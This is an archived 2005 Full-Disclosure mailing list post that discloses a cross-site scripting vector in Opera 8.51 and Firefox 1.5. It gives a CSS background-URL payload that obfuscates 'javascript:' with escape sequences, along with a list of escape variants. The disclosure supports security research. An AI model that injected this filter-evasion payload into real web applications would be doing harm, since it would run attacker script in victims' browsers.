lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri Dec 2 16:16:22 2005 From: st4rdust at gmail.com (hoshikuzu stardust) Subject: Opera/8.51 Firefox/1.5 XSS attacking vector Hello full-disclosure. Sample: <anytag style="background:url("javascri\Dpt:/*/**/(function a() {alert('JavaScript is executed.')})();");" /> Affected Web browsers are `Opera Version 8.51` and `Firefox/1.5`. ( Tested on Windows XP servicepack2. ) Variant: "\d" "\D" "\0d" "\00000d" "\d " "\00000d " "\a" "\9" e.t.c. (Maybe we must checkout \7 via IE on Mac (a.k.a. BELL on Mac. ), I do not have Mac. If your web application does not sanitize output it is very easy to inject malicious scripts. Is it well-known information ? ,sorry. BEST REGARDS. -- hoshikuzu | star_dust
Powered by blists - more mailing lists